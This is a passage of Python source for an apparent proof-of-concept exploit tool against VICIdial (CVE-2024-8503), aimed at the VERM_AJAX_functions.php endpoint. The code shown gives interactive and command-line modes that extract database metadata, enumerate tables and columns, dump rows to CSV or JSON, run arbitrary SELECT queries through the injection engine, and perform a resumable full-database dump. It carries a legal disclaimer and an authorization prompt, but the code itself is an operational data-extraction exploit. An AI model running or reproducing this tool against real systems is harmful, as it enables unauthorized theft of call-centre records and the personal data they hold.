                if result:
                    self.scan_state.update_metadata('db_privileges', result)
            elif choice == '6':
                result = self.scanner.extract_metadata('Table Count', self.metadata_queries['table_count'])
                if result:
                    self.scan_state.update_metadata('table_count', result)
            elif choice == '7':
                results = {}
                for name, query in self.metadata_queries.items():
                    result = self.scanner.extract_metadata(name, query)
                    if result:
                        results[name] = result
                        self.scan_state.update_metadata(name, result)
                OutputFormatter.print_metadata_summary(results)
            else:
                print("[-] Invalid option")
    
    def list_tables_interactive(self):
        """Ask the scanner for the table list; if any came back, save and print them."""
        print(f"\n[+] Listing tables (limit: {DEFAULT_TABLE_LIMIT})...")

        found = self.scanner.list_tables()
        if not found:
            return

        self.scan_state.update_tables(found)
        OutputFormatter.print_table_list(found)
    
    def get_columns_interactive(self):
        """Interactive column discovery"""
        table = input("\nEnter table name: ").strip()
        if not table:
            print("[-] Table name required")
            return
        
        limit_input = input(f"Number of columns to retrieve (max {MAX_COLUMN_LIMIT}) [{DEFAULT_COLUMN_LIMIT}]: ").strip()
        limit = int(limit_input) if limit_input else DEFAULT_COLUMN_LIMIT
        
        columns = self.scanner.get_table_columns(table, limit)
        if columns:
            self.scan_state.update_table_columns(table, columns)
            OutputFormatter.print_columns_list(table, columns)
    
    def extract_data_interactive(self):
        """Interactive data extraction"""
        table = input("\nEnter table name: ").strip()
        if not table:
            print("[-] Table name required")
            return
        
        columns_str = input("Enter column names (comma-separated): ").strip()
        if not columns_str:
            print("[-] Column names required")
            return
        
        columns = [c.strip() for c in columns_str.split(',')]
        
        limit_input = input(f"Number of rows to extract (max {MAX_ROW_LIMIT}) [{DEFAULT_ROW_LIMIT}]: ").strip()
        limit = int(limit_input) if limit_input else DEFAULT_ROW_LIMIT
        
        data = self.scanner.extract_table_data(table, columns, limit)
        OutputFormatter.print_table_data(table, columns, data)
        
        export = input("\nExport to CSV? (y/n): ").strip().lower()
        if export == 'y':
            filename = f"{table}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.csv"
            OutputFormatter.export_csv(columns, data, filename)
    
    def auto_extract_interactive(self):
        """Interactive auto-extraction"""
        table = input("\nEnter table name: ").strip()
        if not table:
            print("[-] Table name required")
            return
        
        columns, data = self.scanner.auto_extract_table(table)
        
        if columns:
            self.scan_state.update_table_columns(table, columns)
            OutputFormatter.print_table_data(table, columns, data)
            
            export = input("\nExport to CSV? (y/n): ").strip().lower()
            if export == 'y':
                filename = f"{table}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.csv"
                OutputFormatter.export_csv(columns, data, filename)
    
    def custom_query_interactive(self):
        """Execute custom SQL query"""
        print("\n[!] Enter SQL query (SELECT only, no modifications)")
        query = input("Query: ").strip()
        
        if not query:
            print("[-] Query required")
            return
        
        if not query.upper().startswith('SELECT'):
            query = f"SELECT {query}"
        
        print(f"\n[+] Executing: {query}")
        sys.stdout.write("[+] Result: ")
        sys.stdout.flush()
        
        try:
            result = self.scanner.engine.extract_string(query)
            print(f"\n[+] {repr(result)}")
        except Exception as e:
            print(f"\n[-] Error: {e}")
    
    def view_scan_state(self):
        """View current scan state"""
        print("\n" + "="*70)
        print("CURRENT SCAN STATE")
        print("="*70)
        print(f"Target: {self.scan_state.get_target()}")
        print(f"Last Updated: {self.scan_state.state.get('last_updated', 'Never')}")
        print(f"\nCompleted Steps: {len(self.scan_state.state['completed_steps'])}")
        for step in self.scan_state.state['completed_steps']:
            print(f"  ✓ {step}")
        
        print(f"\nMetadata Collected: {len(self.scan_state.state['metadata_results'])}")
        for key, val in self.scan_state.state['metadata_results'].items():
            print(f"  • {key}: {val[:50]}...")
        
        print(f"\nTables Found: {len(self.scan_state.get_tables())}")
        print(f"Tables with Columns: {len(self.scan_state.state.get('table_columns', {}))}")
        
        print("="*70)
    
    def clear_scan_state_menu(self):
        """Clear scan state with confirmation"""
        confirm = input("\nAre you sure you want to clear all scan state? (yes/no): ").strip().lower()
        if confirm == 'yes':
            self.scan_state.clear_state()
            print("[+] Scan state cleared successfully")
        else:
            print("[+] Clear operation cancelled")
    
    def full_scan(self):
        """Run the three-step full scan (metadata, table list, per-table data) and export it as JSON.

        Progress for metadata, the table list and each table's columns is
        read from and written to the scan state, so a repeated run reuses
        them. Row data is not cached here: it is extracted again for every
        table on each run. The combined result is written to a timestamped
        ``full_scan_*.json`` file.

        A table listing that comes back empty or ``None`` is treated as
        "no tables" so the scan finishes with an export instead of failing
        on ``len()``.
        """
        print("\n" + "="*70)
        print("FULL SCAN - COMPREHENSIVE DATA EXTRACTION")
        print("="*70)
        print("This will extract:")
        print("  • All metadata")
        print(f"  • Tables (up to {DEFAULT_TABLE_LIMIT})")
        print(f"  • Columns for each table (up to {MAX_COLUMN_LIMIT} per table)")
        print(f"  • Rows for each column (up to {MAX_ROW_LIMIT} per table)")
        print("\n[!] This operation is RESUMABLE - progress is saved automatically")
        print("="*70)

        confirm = input("\nProceed with full scan? (y/n): ").strip().lower()
        if confirm != 'y':
            print("[+] Full scan cancelled")
            return

        self.scan_state.set_target(self.scanner.target)
        all_results = {
            'timestamp': datetime.now().isoformat(),
            'target': self.scanner.target,
            'metadata': {},
            'tables': {}
        }

        # Step 1: Extract metadata
        if not self.scan_state.is_step_completed('metadata'):
            print("\n[STEP 1/3] Extracting metadata...")
            for name, query in self.metadata_queries.items():
                cached = self.scan_state.get_metadata(name)
                if cached:
                    print(f"[+] Using cached {name}: {cached}")
                    all_results['metadata'][name] = cached
                else:
                    result = self.scanner.extract_metadata(name, query)
                    if result:
                        self.scan_state.update_metadata(name, result)
                        all_results['metadata'][name] = result

            self.scan_state.mark_step_completed('metadata')
            OutputFormatter.print_metadata_summary(all_results['metadata'])
        else:
            print("\n[STEP 1/3] Metadata already extracted (resuming)")
            all_results['metadata'] = self.scan_state.state['metadata_results']

        # Step 2: List all tables
        if not self.scan_state.is_step_completed('tables'):
            print("\n[STEP 2/3] Listing all tables...")
            # Normalise a failed listing to [] so len() and the loop below are safe.
            tables = self.scanner.list_tables(DEFAULT_TABLE_LIMIT) or []
            if tables:
                self.scan_state.update_tables(tables)
                OutputFormatter.print_table_list(tables)
                # Only mark the step done when something was listed, so a
                # failed listing is retried on the next run.
                self.scan_state.mark_step_completed('tables')
        else:
            print("\n[STEP 2/3] Tables already listed (resuming)")
            tables = self.scan_state.get_tables() or []
            print(f"[+] Using cached {len(tables)} tables")

        if not tables:
            print("[-] No tables available; nothing to extract in step 3")

        # Step 3: Extract columns and data for each table
        print(f"\n[STEP 3/3] Extracting data from {len(tables)} tables...")
        print(f"[!] Limit: {MAX_COLUMN_LIMIT} columns, {MAX_ROW_LIMIT} rows per table")

        for idx, table in enumerate(tables, 1):
            print(f"\n{'='*70}")
            print(f"Processing Table {idx}/{len(tables)}: {table}")
            print(f"{'='*70}")

            # Reuse columns saved by an earlier run when available
            cached_columns = self.scan_state.get_table_columns(table)
            if cached_columns:
                print(f"[+] Using cached columns for {table}: {cached_columns}")
                columns = cached_columns
            else:
                columns = self.scanner.get_table_columns(table, MAX_COLUMN_LIMIT)
                if columns:
                    self.scan_state.update_table_columns(table, columns)

            if not columns:
                print(f"[-] No columns found for {table}, skipping...")
                continue

            # Extract data
            data = self.scanner.extract_table_data(table, columns, MAX_ROW_LIMIT)

            # Tables that yield no rows are left out of the exported results.
            if data:
                all_results['tables'][table] = {
                    'columns': columns,
                    'rows': data
                }
                OutputFormatter.print_table_data(table, columns, data)

        # Export final results
        filename = f"full_scan_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
        OutputFormatter.export_json(all_results, filename)

        print("\n" + "="*70)
        print("FULL SCAN COMPLETE")
        print("="*70)
        print(f"[+] Metadata items: {len(all_results['metadata'])}")
        print(f"[+] Tables processed: {len(all_results['tables'])}")
        print(f"[+] Results saved to: {filename}")
        print("="*70)
    
    def run(self):
        """Run interactive mode"""
        while True:
            self.show_main_menu()
            choice = input("\nSelect option: ").strip()
            
            if choice == '0':
                print("\n[+] Exiting...")
                break
            elif choice == '1':
                self.extract_metadata_interactive()
            elif choice == '2':
                self.list_tables_interactive()
            elif choice == '3':
                self.get_columns_interactive()
            elif choice == '4':
                self.extract_data_interactive()
            elif choice == '5':
                self.auto_extract_interactive()
            elif choice == '6':
                self.custom_query_interactive()
            elif choice == '7':
                self.full_scan()
            elif choice == '8':
                self.view_scan_state()
            elif choice == '9':
                self.clear_scan_state_menu()
            else:
                print("[-] Invalid option")

# ============================================================================
# COMMAND LINE INTERFACE
# ============================================================================

def parse_arguments():
    """Build the command-line parser and return the parsed ``sys.argv`` arguments.

    The accepted ``--metadata`` values are the keys of ``METADATA_QUERIES``
    plus ``all``, so the option cannot drift out of sync with the query table.

    Returns:
        argparse.Namespace: the parsed options. ``--column-limit`` and
        ``--rows`` default to ``DEFAULT_COLUMN_LIMIT`` and ``DEFAULT_ROW_LIMIT``.
    """
    parser = argparse.ArgumentParser(
        description='VICIdial CVE-2024-8503 Proof of Concept Tool',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog='''
Examples:
  # Interactive mode
  %(prog)s --url https://target.com --interactive

  # Extract metadata
  %(prog)s --url https://target.com --metadata db_version database db_user

  # List tables
  %(prog)s --url https://target.com --list-tables

  # Get columns
  %(prog)s --url https://target.com --get-columns call_log

  # Extract table data
  %(prog)s --url https://target.com --table call_log --columns uniqueid,channel --rows 3

  # Auto-extract table data
  %(prog)s --url https://target.com --auto-extract call_log

  # Full scan (resumable)
  %(prog)s --url https://target.com --full-scan

  # Self-check (no network activity)
  %(prog)s --self-check

LEGAL NOTICE:
  This tool is for authorized security testing only. Unauthorized access
  to computer systems is illegal. Obtain written permission before testing.
        '''
    )

    # Single source of truth: every configured metadata query, plus the "all" shortcut.
    metadata_choices = [*METADATA_QUERIES, 'all']

    parser.add_argument('--url', help='Target URL')
    parser.add_argument('--path', default='/VERM/VERM_AJAX_functions.php', help='Path to vulnerable endpoint')
    parser.add_argument('--interactive', action='store_true', help='Run in interactive mode')
    parser.add_argument('--metadata', nargs='+',
                       choices=metadata_choices,
                       help='Extract metadata')
    parser.add_argument('--list-tables', action='store_true', help='List database tables')
    parser.add_argument('--get-columns', metavar='TABLE', help='Get columns for table')
    parser.add_argument('--column-limit', type=int, default=DEFAULT_COLUMN_LIMIT,
                       help=f'Number of columns (max {MAX_COLUMN_LIMIT}, default: {DEFAULT_COLUMN_LIMIT})')
    parser.add_argument('--table', help='Table to extract data from')
    parser.add_argument('--columns', help='Comma-separated column names')
    parser.add_argument('--rows', type=int, default=DEFAULT_ROW_LIMIT,
                       help=f'Number of rows (max {MAX_ROW_LIMIT}, default: {DEFAULT_ROW_LIMIT})')
    parser.add_argument('--auto-extract', metavar='TABLE', help='Auto-extract table data')
    parser.add_argument('--custom-query', help='Execute custom SQL query')
    parser.add_argument('--full-scan', action='store_true', help='Perform full scan (resumable)')
    parser.add_argument('--skip-vuln-check', action='store_true', help='Skip vulnerability verification')
    parser.add_argument('--export', help='Export results to file')
    parser.add_argument('--self-check', action='store_true', help='Print configuration and exit (no network)')

    return parser.parse_args()

def run_self_check():
    """Print the version, configured limits, state file name and metadata keys.

    Only module constants are read and printed; nothing else is called.
    """
    metadata_keys = ', '.join(sorted(METADATA_QUERIES.keys()))
    report = (
        "\n[+] Self-check (no network activity)",
        f"[+] Version: {VERSION}",
        f"[+] Limits: Tables={DEFAULT_TABLE_LIMIT}, Columns={MAX_COLUMN_LIMIT}, Rows={MAX_ROW_LIMIT}",
        f"[+] Max metadata length: {MAX_LENGTH}",
        f"[+] Max cell length: {MAX_CELL_LENGTH}",
        "[+] State file: .vicidial_scan_state.json",
        f"[+] Metadata keys: {metadata_keys}",
    )
    for line in report:
        print(line)

def main():
    """Command-line entry point.

    Flow: print the banner, parse arguments, handle ``--self-check``,
    require ``--url`` and an explicit authorization confirmation, offer to
    resume a saved scan for the same target, initialise the scanner, then
    run either interactive mode or each requested one-shot operation.

    Differences from a naive pass-through of the arguments:
      * ``--rows`` and ``--column-limit`` are clamped to 1..MAX so the
        limits documented in ``--help`` are enforced.
      * blank entries in ``--columns`` are dropped.
      * ``--table`` or ``--columns`` given alone produces a message
        instead of being silently ignored.
      * the ``SELECT`` prefix test for ``--custom-query`` is
        case-insensitive, as in interactive mode.
    """
    start_time = time.time()

    OutputFormatter.print_banner()
    args = parse_arguments()

    if args.self_check:
        run_self_check()
        return

    if not args.url:
        print("[-] Missing required argument: --url")
        return

    print("\n[!] LEGAL DISCLAIMER:")
    print("    This tool is for AUTHORIZED SECURITY TESTING ONLY.")
    print("    Unauthorized access is ILLEGAL. Proceed only with written permission.\n")

    response = input("Do you have authorization to test this target? (yes/no): ").strip().lower()
    if response != 'yes':
        print("\n[!] Authorization required. Exiting.")
        return

    def _bounded(value, maximum, label):
        """Clamp a user-supplied limit into 1..maximum, reporting any adjustment."""
        bounded = max(1, min(value, maximum))
        if bounded != value:
            print(f"[!] {label} limit {value} is outside 1-{maximum}; using {bounded}")
        return bounded

    scan_state = ScanState()

    # One normalised form for both the resume check and the banner, so a
    # trailing slash on --url does not print a double slash.
    # NOTE(review): presumably this matches how the scanner builds its own
    # target, since saved targets are compared against it; confirm.
    target_url = args.url.rstrip('/') + args.path

    # Check for resumable scan
    saved_target = scan_state.get_target()
    if saved_target and saved_target == target_url:
        if scan_state.show_resume_prompt():
            print("[+] Resuming from previous scan...")
        else:
            scan_state.clear_state()

    print("\n[+] Initializing scanner...")
    print(f"[+] Target: {target_url}")
    print(f"[+] Limits: Tables={DEFAULT_TABLE_LIMIT}, Columns={MAX_COLUMN_LIMIT}, Rows={MAX_ROW_LIMIT}")

    scanner = VulnerabilityScanner(args.url, args.path)

    if not scanner.initialize(skip_vuln_check=args.skip_vuln_check):
        print("\n[-] Initialization failed. Exiting.")
        send_notification("VICIdial PoC", "Scan failed - initialization error")
        return

    scan_state.set_target(scanner.target)

    if args.interactive:
        interactive = InteractiveMode(scanner, scan_state)
        interactive.run()

        duration = time.time() - start_time
        print(f"\n[+] Total time: {duration/60:.1f} minutes")
        send_notification("VICIdial PoC", f"Interactive scan completed in {duration/60:.1f} minutes")
        play_completion_sound()
        return

    metadata_queries = METADATA_QUERIES

    if args.metadata:
        results = {}
        if 'all' in args.metadata:
            queries = metadata_queries
        else:
            queries = {k: metadata_queries[k] for k in args.metadata if k in metadata_queries}

        for name, query in queries.items():
            result = scanner.extract_metadata(name, query)
            if result:
                results[name] = result
                scan_state.update_metadata(name, result)

        OutputFormatter.print_metadata_summary(results)

        if args.export:
            OutputFormatter.export_json(results, args.export)

    if args.list_tables:
        tables = scanner.list_tables()
        if tables:
            scan_state.update_tables(tables)
            OutputFormatter.print_table_list(tables)

    if args.get_columns:
        column_limit = _bounded(args.column_limit, MAX_COLUMN_LIMIT, "Column")
        columns = scanner.get_table_columns(args.get_columns, column_limit)
        if columns:
            scan_state.update_table_columns(args.get_columns, columns)
            OutputFormatter.print_columns_list(args.get_columns, columns)

    if args.table and args.columns:
        # Drop blanks left by stray commas such as "a,,b" or "a,".
        columns = [c.strip() for c in args.columns.split(',') if c.strip()]
        if columns:
            row_limit = _bounded(args.rows, MAX_ROW_LIMIT, "Row")
            data = scanner.extract_table_data(args.table, columns, row_limit)
            OutputFormatter.print_table_data(args.table, columns, data)

            if args.export:
                OutputFormatter.export_csv(columns, data, args.export)
        else:
            print("[-] Column names required")
    elif args.table or args.columns:
        print("[-] --table and --columns must be used together")

    if args.auto_extract:
        columns, data = scanner.auto_extract_table(args.auto_extract)

        if columns and data:
            scan_state.update_table_columns(args.auto_extract, columns)
            OutputFormatter.print_table_data(args.auto_extract, columns, data)

            if args.export:
                OutputFormatter.export_csv(columns, data, args.export)

    if args.custom_query:
        raw_query = args.custom_query.strip()
        # Case-insensitive, so "select 1" is not turned into "SELECT select 1".
        if raw_query.upper().startswith('SELECT'):
            query = raw_query
        else:
            query = f"SELECT {raw_query}"
        print(f"\n[+] Executing: {query}")
        sys.stdout.write("[+] Result: ")
        sys.stdout.flush()

        try:
            result = scanner.engine.extract_string(query)
            print(f"\n[+] {repr(result)}")
        except Exception as e:
            print(f"\n[-] Error: {e}")

    if args.full_scan:
        interactive = InteractiveMode(scanner, scan_state)
        interactive.full_scan()

    duration = time.time() - start_time

    print("\n[+] Scan complete!")
    print(f"[+] Total time: {duration/60:.1f} minutes")
    print("[+] Remember: All operations were READ-ONLY")
    print("[+] CVE-2024-8503 - CRITICAL Severity\n")

    send_notification("VICIdial PoC", f"Scan completed in {duration/60:.1f} minutes")
    play_completion_sound()

if __name__ == '__main__':
    # None means main() returned normally, so no explicit exit call is made.
    exit_status = None
    try:
        main()
    except KeyboardInterrupt:
        print("\n\n[!] Interrupted by user. Exiting...")
        exit_status = 0
    except Exception as err:
        # Last-resort boundary: report the failure and exit non-zero.
        print(f"\n[-] Unexpected error: {err}")
        exit_status = 1

    if exit_status is not None:
        sys.exit(exit_status)